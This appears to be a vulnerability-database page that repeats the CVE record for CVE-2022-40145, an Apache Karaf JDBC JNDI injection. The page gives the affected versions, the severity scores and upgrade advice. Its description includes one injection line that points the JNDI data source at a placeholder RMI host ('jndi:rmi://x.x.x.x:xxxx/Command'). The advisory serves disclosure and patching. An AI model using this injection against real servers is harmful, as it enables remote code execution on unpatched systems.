CVE-2022-40145 - Vulnerability Details

Vendors	Products
Apache	Karaf

Link	Providers
https://karaf.apache.org/security/cve-2022-40145.txt
https://nvd.nist.gov/vuln/detail/CVE-2022-40145
https://www.cve.org/CVERecord?id=CVE-2022-40145

Type	Values Removed	Values Added
Metrics		ssvc `{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}`

Show plain JSON

{"dataType": "CVE_RECORD", "dataVersion": "5.1", "cveMetadata": {"cveId": "CVE-2022-40145", "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "state": "PUBLISHED", "assignerShortName": "apache", "dateReserved": "2022-09-07T08:02:30.677Z", "datePublished": "2022-12-21T15:23:42.847Z", "dateUpdated": "2025-04-15T18:03:47.618Z"}, "containers": {"cna": {"affected": [{"defaultStatus": "unaffected", "product": "Apache Karaf", "vendor": "Apache Software Foundation", "versions": [{"lessThan": "4.4.2", "status": "affected", "version": "4.4.0", "versionType": "maven"}, {"lessThan": "4.3.8", "status": "affected", "version": "0", "versionType": "maven"}]}], "credits": [{"lang": "en", "type": "reporter", "value": "Xun Bai <bbbbear68@gmail.com>"}], "descriptions": [{"lang": "en", "supportingMedia": [{"base64": false, "type": "text/html", "value": "<span style=\"background-color: rgb(255, 255, 255);\">This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.<br><br>The function jaas.modules.src.main.java.por</span><span style=\"background-color: rgb(255, 255, 255);\">g.apache.karaf.jass.modules.</span><span style=\"background-color: rgb(255, 255, 255);\">jdbc.JDBCUtils#doCreateDatasou</span><span style=\"background-color: rgb(255, 255, 255);\">rce</span><br><span style=\"background-color: rgb(255, 255, 255);\">use InitialContext.lookup(jndiName</span><span style=\"background-color: rgb(255, 255, 255);\">) without filtering.<br>An user can modify&nbsp;</span><span style=\"background-color: rgb(255, 255, 255);\">`options.put(JDBCUtils.DATASOU</span><span style=\"background-color: rgb(255, 255, 255);\">RCE, \"osgi:\" +&nbsp;</span><span style=\"background-color: rgb(255, 255, 255);\">DataSource.class.getName());` to `options.put(JDBCUtils.DATASOU</span><span style=\"background-color: rgb(255, 255, 255);\">RCE,</span><span style=\"background-color: rgb(255, 255, 255);\">\"jndi:rmi://x.x.x.x:xxxx/Comma</span><span style=\"background-color: rgb(255, 255, 255);\">nd\");` in JdbcLoginModuleTest#setup.</span><br><br><span style=\"background-color: rgb(255, 255, 255);\">This is vulnerable to a remote code execution (RCE) attack when a</span><br><span style=\"background-color: rgb(255, 255, 255);\">configuration uses a JNDI LDAP data source URI when an attacker has</span><br><span style=\"background-color: rgb(255, 255, 255);\">control of the target LDAP server.</span><p>This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.</p>We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"}], "value": "This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\n\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\n\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\n\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"}], "metrics": [{"other": {"content": {"text": "low"}, "type": "Textual description of severity"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-74", "description": "CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "lang": "en", "type": "CWE"}]}, {"descriptions": [{"cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "shortName": "apache", "dateUpdated": "2022-12-21T15:23:42.847Z"}, "references": [{"tags": ["vendor-advisory"], "url": "https://karaf.apache.org/security/cve-2022-40145.txt"}], "source": {"defect": ["KARAF-7568"], "discovery": "EXTERNAL"}, "title": "Apache Karaf: JDBC JAAS LDAP injection", "x_generator": {"engine": "Vulnogram 0.1.0-dev"}}, "adp": [{"providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-03T12:14:39.957Z"}, "title": "CVE Program Container", "references": [{"tags": ["vendor-advisory", "x_transferred"], "url": "https://karaf.apache.org/security/cve-2022-40145.txt"}]}, {"metrics": [{"cvssV3_1": {"scope": "UNCHANGED", "version": "3.1", "baseScore": 9.8, "attackVector": "NETWORK", "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "integrityImpact": "HIGH", "userInteraction": "NONE", "attackComplexity": "LOW", "availabilityImpact": "HIGH", "privilegesRequired": "NONE", "confidentialityImpact": "HIGH"}}, {"other": {"type": "ssvc", "content": {"timestamp": "2025-04-15T18:02:30.458673Z", "id": "CVE-2022-40145", "options": [{"Exploitation": "none"}, {"Automatable": "yes"}, {"Technical Impact": "total"}], "role": "CISA Coordinator", "version": "2.0.3"}}}], "title": "CISA ADP Vulnrichment", "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2025-04-15T18:03:47.618Z"}}]}}

{

dataType : CVE_RECORD (string)

dataVersion : 5.1 (string)

cveMetadata : { »

cveId : CVE-2022-40145 (string)

assignerOrgId : f0158376-9dc2-43b6-827c-5f631a4d8d09 (string)

state : PUBLISHED (string)

assignerShortName : apache (string)

dateReserved : 2022-09-07T08:02:30.677Z (string)

datePublished : 2022-12-21T15:23:42.847Z (string)

dateUpdated : 2025-04-15T18:03:47.618Z (string)

}

containers : { »

cna : { »

affected : [ »

0 : { »

defaultStatus : unaffected (string)

product : Apache Karaf (string)

vendor : Apache Software Foundation (string)

versions : [ »

0 : { »

lessThan : 4.4.2 (string)

status : affected (string)

version : 4.4.0 (string)

versionType : maven (string)

}

1 : { »

lessThan : 4.3.8 (string)

status : affected (string)

version : 0 (string)

versionType : maven (string)

}

]

}

]

credits : [ »

0 : { »

lang : en (string)

type : reporter (string)

value : Xun Bai <bbbbear68@gmail.com> (string)

}

]

descriptions : [ »

0 : { »

lang : en (string)

supportingMedia : [ »

0 : { »

base64 : false (boolean)

type : text/html (string)

value : This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 (string)

}

]

value : This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 (string)

}

]

metrics : [ »

0 : { »

other : { »

content : { »

text : low (string)

}

type : Textual description of severity (string)

}

]

problemTypes : [ »

0 : { »

descriptions : [ »

0 : { »

cweId : CWE-74 (string)

description : CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') (string)

lang : en (string)

type : CWE (string)

}

]

}

1 : { »

descriptions : [ »

0 : { »

cweId : CWE-20 (string)

description : CWE-20 Improper Input Validation (string)

lang : en (string)

type : CWE (string)

}

]

}

]

providerMetadata : { »

orgId : f0158376-9dc2-43b6-827c-5f631a4d8d09 (string)

shortName : apache (string)

dateUpdated : 2022-12-21T15:23:42.847Z (string)

}

references : [ »

0 : { »

tags : [ »

0 : vendor-advisory (string)

]

url : https://karaf.apache.org/security/cve-2022-40145.txt (string)

}

]

source : { »

defect : [ »

0 : KARAF-7568 (string)

]

discovery : EXTERNAL (string)

}

title : Apache Karaf: JDBC JAAS LDAP injection (string)

x_generator : { »

engine : Vulnogram 0.1.0-dev (string)

}

adp : [ »

0 : { »

providerMetadata : { »

orgId : af854a3a-2127-422b-91ae-364da2661108 (string)

shortName : CVE (string)

dateUpdated : 2024-08-03T12:14:39.957Z (string)

}

title : CVE Program Container (string)

references : [ »

0 : { »

tags : [ »

0 : vendor-advisory (string)

1 : x_transferred (string)

]

url : https://karaf.apache.org/security/cve-2022-40145.txt (string)

}

]

}

1 : { »

metrics : [ »

0 : { »

cvssV3_1 : { »

scope : UNCHANGED (string)

version : 3.1 (string)

baseScore : 9.8 (number)

attackVector : NETWORK (string)

baseSeverity : CRITICAL (string)

vectorString : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (string)

integrityImpact : HIGH (string)

userInteraction : NONE (string)

attackComplexity : LOW (string)

availabilityImpact : HIGH (string)

privilegesRequired : NONE (string)

confidentialityImpact : HIGH (string)

}

1 : { »

other : { »

type : ssvc (string)

content : { »

timestamp : 2025-04-15T18:02:30.458673Z (string)

id : CVE-2022-40145 (string)

options : [ »

0 : { »

Exploitation : none (string)

}

1 : { »

Automatable : yes (string)

}

2 : { »

Technical Impact : total (string)

}

]

role : CISA Coordinator (string)

version : 2.0.3 (string)

}

]

title : CISA ADP Vulnrichment (string)

providerMetadata : { »

orgId : 134c704f-9b21-4f2e-91b3-4a467353bcc0 (string)

shortName : CISA-ADP (string)

dateUpdated : 2025-04-15T18:03:47.618Z (string)

}

]

}

Show plain JSON

{"dataType": "CVE_RECORD", "containers": {"adp": [{"title": "CVE Program Container", "references": [{"url": "https://karaf.apache.org/security/cve-2022-40145.txt", "tags": ["vendor-advisory", "x_transferred"]}], "providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-03T12:14:39.957Z"}}, {"title": "CISA ADP Vulnrichment", "metrics": [{"cvssV3_1": {"scope": "UNCHANGED", "version": "3.1", "baseScore": 9.8, "attackVector": "NETWORK", "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "integrityImpact": "HIGH", "userInteraction": "NONE", "attackComplexity": "LOW", "availabilityImpact": "HIGH", "privilegesRequired": "NONE", "confidentialityImpact": "HIGH"}}, {"other": {"type": "ssvc", "content": {"id": "CVE-2022-40145", "role": "CISA Coordinator", "options": [{"Exploitation": "none"}, {"Automatable": "yes"}, {"Technical Impact": "total"}], "version": "2.0.3", "timestamp": "2025-04-15T18:02:30.458673Z"}}}], "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2025-04-15T18:03:02.485Z"}}], "cna": {"title": "Apache Karaf: JDBC JAAS LDAP injection", "source": {"defect": ["KARAF-7568"], "discovery": "EXTERNAL"}, "credits": [{"lang": "en", "type": "reporter", "value": "Xun Bai <bbbbear68@gmail.com>"}], "metrics": [{"other": {"type": "Textual description of severity", "content": {"text": "low"}}}], "affected": [{"vendor": "Apache Software Foundation", "product": "Apache Karaf", "versions": [{"status": "affected", "version": "4.4.0", "lessThan": "4.4.2", "versionType": "maven"}, {"status": "affected", "version": "0", "lessThan": "4.3.8", "versionType": "maven"}], "defaultStatus": "unaffected"}], "references": [{"url": "https://karaf.apache.org/security/cve-2022-40145.txt", "tags": ["vendor-advisory"]}], "x_generator": {"engine": "Vulnogram 0.1.0-dev"}, "descriptions": [{"lang": "en", "value": "This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\n\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\n\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\n\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8", "supportingMedia": [{"type": "text/html", "value": "<span style=\"background-color: rgb(255, 255, 255);\">This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.<br><br>The function jaas.modules.src.main.java.por</span><span style=\"background-color: rgb(255, 255, 255);\">g.apache.karaf.jass.modules.</span><span style=\"background-color: rgb(255, 255, 255);\">jdbc.JDBCUtils#doCreateDatasou</span><span style=\"background-color: rgb(255, 255, 255);\">rce</span><br><span style=\"background-color: rgb(255, 255, 255);\">use InitialContext.lookup(jndiName</span><span style=\"background-color: rgb(255, 255, 255);\">) without filtering.<br>An user can modify&nbsp;</span><span style=\"background-color: rgb(255, 255, 255);\">`options.put(JDBCUtils.DATASOU</span><span style=\"background-color: rgb(255, 255, 255);\">RCE, \"osgi:\" +&nbsp;</span><span style=\"background-color: rgb(255, 255, 255);\">DataSource.class.getName());` to `options.put(JDBCUtils.DATASOU</span><span style=\"background-color: rgb(255, 255, 255);\">RCE,</span><span style=\"background-color: rgb(255, 255, 255);\">\"jndi:rmi://x.x.x.x:xxxx/Comma</span><span style=\"background-color: rgb(255, 255, 255);\">nd\");` in JdbcLoginModuleTest#setup.</span><br><br><span style=\"background-color: rgb(255, 255, 255);\">This is vulnerable to a remote code execution (RCE) attack when a</span><br><span style=\"background-color: rgb(255, 255, 255);\">configuration uses a JNDI LDAP data source URI when an attacker has</span><br><span style=\"background-color: rgb(255, 255, 255);\">control of the target LDAP server.</span><p>This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.</p>We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8", "base64": false}]}], "problemTypes": [{"descriptions": [{"lang": "en", "type": "CWE", "cweId": "CWE-74", "description": "CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')"}]}, {"descriptions": [{"lang": "en", "type": "CWE", "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation"}]}], "providerMetadata": {"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "shortName": "apache", "dateUpdated": "2022-12-21T15:23:42.847Z"}}}, "cveMetadata": {"cveId": "CVE-2022-40145", "state": "PUBLISHED", "dateUpdated": "2025-04-15T18:03:47.618Z", "dateReserved": "2022-09-07T08:02:30.677Z", "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "datePublished": "2022-12-21T15:23:42.847Z", "assignerShortName": "apache"}, "dataVersion": "5.1"}

{

dataType : CVE_RECORD (string)

containers : { »

adp : [ »

0 : { »

title : CVE Program Container (string)

references : [ »

0 : { »

url : https://karaf.apache.org/security/cve-2022-40145.txt (string)

tags : [ »

0 : vendor-advisory (string)

1 : x_transferred (string)

]

}

]

providerMetadata : { »

orgId : af854a3a-2127-422b-91ae-364da2661108 (string)

shortName : CVE (string)

dateUpdated : 2024-08-03T12:14:39.957Z (string)

}

1 : { »

title : CISA ADP Vulnrichment (string)

metrics : [ »

0 : { »

cvssV3_1 : { »

scope : UNCHANGED (string)

version : 3.1 (string)

baseScore : 9.8 (number)

attackVector : NETWORK (string)

baseSeverity : CRITICAL (string)

vectorString : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (string)

integrityImpact : HIGH (string)

userInteraction : NONE (string)

attackComplexity : LOW (string)

availabilityImpact : HIGH (string)

privilegesRequired : NONE (string)

confidentialityImpact : HIGH (string)

}

1 : { »

other : { »

type : ssvc (string)

content : { »

id : CVE-2022-40145 (string)

role : CISA Coordinator (string)

options : [ »

0 : { »

Exploitation : none (string)

}

1 : { »

Automatable : yes (string)

}

2 : { »

Technical Impact : total (string)

}

]

version : 2.0.3 (string)

timestamp : 2025-04-15T18:02:30.458673Z (string)

}

]

providerMetadata : { »

orgId : 134c704f-9b21-4f2e-91b3-4a467353bcc0 (string)

shortName : CISA-ADP (string)

dateUpdated : 2025-04-15T18:03:02.485Z (string)

}

]

cna : { »

title : Apache Karaf: JDBC JAAS LDAP injection (string)

source : { »

defect : [ »

0 : KARAF-7568 (string)

]

discovery : EXTERNAL (string)

}

credits : [ »

0 : { »

lang : en (string)

type : reporter (string)

value : Xun Bai <bbbbear68@gmail.com> (string)

}

]

metrics : [ »

0 : { »

other : { »

type : Textual description of severity (string)

content : { »

text : low (string)

}

]

affected : [ »

0 : { »

vendor : Apache Software Foundation (string)

product : Apache Karaf (string)

versions : [ »

0 : { »

status : affected (string)

version : 4.4.0 (string)

lessThan : 4.4.2 (string)

versionType : maven (string)

}

1 : { »

status : affected (string)

version : 0 (string)

lessThan : 4.3.8 (string)

versionType : maven (string)

}

]

defaultStatus : unaffected (string)

}

]

references : [ »

0 : { »

url : https://karaf.apache.org/security/cve-2022-40145.txt (string)

tags : [ »

0 : vendor-advisory (string)

]

}

]

x_generator : { »

engine : Vulnogram 0.1.0-dev (string)

}

descriptions : [ »

0 : { »

lang : en (string)

value : This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 (string)

supportingMedia : [ »

0 : { »

type : text/html (string)

value : This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 (string)

base64 : false (boolean)

}

]

}

]

problemTypes : [ »

0 : { »

descriptions : [ »

0 : { »

lang : en (string)

type : CWE (string)

cweId : CWE-74 (string)

description : CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') (string)

}

]

}

1 : { »

descriptions : [ »

0 : { »

lang : en (string)

type : CWE (string)

cweId : CWE-20 (string)

description : CWE-20 Improper Input Validation (string)

}

]

}

]

providerMetadata : { »

orgId : f0158376-9dc2-43b6-827c-5f631a4d8d09 (string)

shortName : apache (string)

dateUpdated : 2022-12-21T15:23:42.847Z (string)

}

cveMetadata : { »

cveId : CVE-2022-40145 (string)

state : PUBLISHED (string)

dateUpdated : 2025-04-15T18:03:47.618Z (string)

dateReserved : 2022-09-07T08:02:30.677Z (string)

assignerOrgId : f0158376-9dc2-43b6-827c-5f631a4d8d09 (string)

datePublished : 2022-12-21T15:23:42.847Z (string)

assignerShortName : apache (string)

}

dataVersion : 5.1 (string)

}

Show plain JSON

{"configurations": [{"nodes": [{"cpeMatch": [{"criteria": "cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*", "matchCriteriaId": "CEDC6799-2894-4DB9-A66B-9481580EDC66", "versionEndExcluding": "4.3.8", "vulnerable": true}, {"criteria": "cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*", "matchCriteriaId": "3320F4C0-A9F6-43C3-B473-1E56EFD0086D", "versionEndExcluding": "4.4.2", "versionStartIncluding": "4.4.0", "vulnerable": true}], "negate": false, "operator": "OR"}]}], "cveTags": [], "descriptions": [{"lang": "en", "value": "This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\n\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\n\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\n\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"}, {"lang": "es", "value": "Esta vulnerabilidad se trata de una posible inyecci\u00f3n de c\u00f3digo cuando un atacante tiene el control del servidor LDAP de destino utilizando la URL JDBC JNDI. La funci\u00f3n jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource utiliza InitialContext.lookup(jndiName) sin filtrar. Un usuario puede modificar `options.put(JDBCUtils.DATASOURCE, \"osgi:\" + DataSource.class.getName());` a `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://xxxx:xxxx/Command \");` en JdbcLoginModuleTest#setup. Esto es vulnerable a un ataque de ejecuci\u00f3n remota de c\u00f3digo (RCE) cuando una configuraci\u00f3n utiliza un URI de origen de datos LDAP JNDI cuando un atacante tiene control del servidor LDAP de destino. Este problema afecta a todas las versiones de Apache Karaf hasta 4.4.1 y 4.3.7. Animamos a los usuarios a actualizar a Apache Karaf al menos 4.4.2 o 4.3.8."}], "id": "CVE-2022-40145", "lastModified": "2025-04-15T18:15:44.667", "metrics": {"cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary"}, {"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary"}]}, "published": "2022-12-21T16:15:08.930", "references": [{"source": "security@apache.org", "tags": ["Vendor Advisory"], "url": "https://karaf.apache.org/security/cve-2022-40145.txt"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory"], "url": "https://karaf.apache.org/security/cve-2022-40145.txt"}], "sourceIdentifier": "security@apache.org", "vulnStatus": "Modified", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-74"}], "source": "security@apache.org", "type": "Secondary"}, {"description": [{"lang": "en", "value": "NVD-CWE-Other"}], "source": "nvd@nist.gov", "type": "Primary"}]}

{

configurations : [ »

0 : { »

nodes : [ »

0 : { »

cpeMatch : [ »

0 : { »

criteria : cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:* (string)

matchCriteriaId : CEDC6799-2894-4DB9-A66B-9481580EDC66 (string)

versionEndExcluding : 4.3.8 (string)

vulnerable : true (boolean)

}

1 : { »

criteria : cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:* (string)

matchCriteriaId : 3320F4C0-A9F6-43C3-B473-1E56EFD0086D (string)

versionEndExcluding : 4.4.2 (string)

versionStartIncluding : 4.4.0 (string)

vulnerable : true (boolean)

}

]

negate : false (boolean)

operator : OR (string)

}

]

}

]

cveTags : [ *empty* ]

descriptions : [ »

0 : { »

lang : en (string)

value : This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 (string)

}

1 : { »

lang : es (string)

value : Esta vulnerabilidad se trata de una posible inyección de código cuando un atacante tiene el control del servidor LDAP de destino utilizando la URL JDBC JNDI. La función jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource utiliza InitialContext.lookup(jndiName) sin filtrar. Un usuario puede modificar `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` a `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://xxxx:xxxx/Command ");` en JdbcLoginModuleTest#setup. Esto es vulnerable a un ataque de ejecución remota de código (RCE) cuando una configuración utiliza un URI de origen de datos LDAP JNDI cuando un atacante tiene control del servidor LDAP de destino. Este problema afecta a todas las versiones de Apache Karaf hasta 4.4.1 y 4.3.7. Animamos a los usuarios a actualizar a Apache Karaf al menos 4.4.2 o 4.3.8. (string)

}

]

id : CVE-2022-40145 (string)

lastModified : 2025-04-15T18:15:44.667 (string)

metrics : { »

cvssMetricV31 : [ »

0 : { »

cvssData : { »

attackComplexity : LOW (string)

attackVector : NETWORK (string)

availabilityImpact : HIGH (string)

baseScore : 9.8 (number)

baseSeverity : CRITICAL (string)

confidentialityImpact : HIGH (string)

integrityImpact : HIGH (string)

privilegesRequired : NONE (string)

scope : UNCHANGED (string)

userInteraction : NONE (string)

vectorString : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (string)

version : 3.1 (string)

}

exploitabilityScore : 3.9 (number)

impactScore : 5.9 (number)

source : nvd@nist.gov (string)

type : Primary (string)

}

1 : { »

cvssData : { »

attackComplexity : LOW (string)

attackVector : NETWORK (string)

availabilityImpact : HIGH (string)

baseScore : 9.8 (number)

baseSeverity : CRITICAL (string)

confidentialityImpact : HIGH (string)

integrityImpact : HIGH (string)

privilegesRequired : NONE (string)

scope : UNCHANGED (string)

userInteraction : NONE (string)

vectorString : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (string)

version : 3.1 (string)

}

exploitabilityScore : 3.9 (number)

impactScore : 5.9 (number)

source : 134c704f-9b21-4f2e-91b3-4a467353bcc0 (string)

type : Secondary (string)

}

]

}

published : 2022-12-21T16:15:08.930 (string)

references : [ »

0 : { »

source : security@apache.org (string)

tags : [ »

0 : Vendor Advisory (string)

]

url : https://karaf.apache.org/security/cve-2022-40145.txt (string)

}

1 : { »

source : af854a3a-2127-422b-91ae-364da2661108 (string)

tags : [ »

0 : Vendor Advisory (string)

]

url : https://karaf.apache.org/security/cve-2022-40145.txt (string)

}

]

sourceIdentifier : security@apache.org (string)

vulnStatus : Modified (string)

weaknesses : [ »

0 : { »

description : [ »

0 : { »

lang : en (string)

value : CWE-20 (string)

}

1 : { »

lang : en (string)

value : CWE-74 (string)

}

]

source : security@apache.org (string)

type : Secondary (string)

}

1 : { »

description : [ »

0 : { »

lang : en (string)

value : NVD-CWE-Other (string)

}

]

source : nvd@nist.gov (string)

type : Primary (string)

}

]

}

Show plain JSON

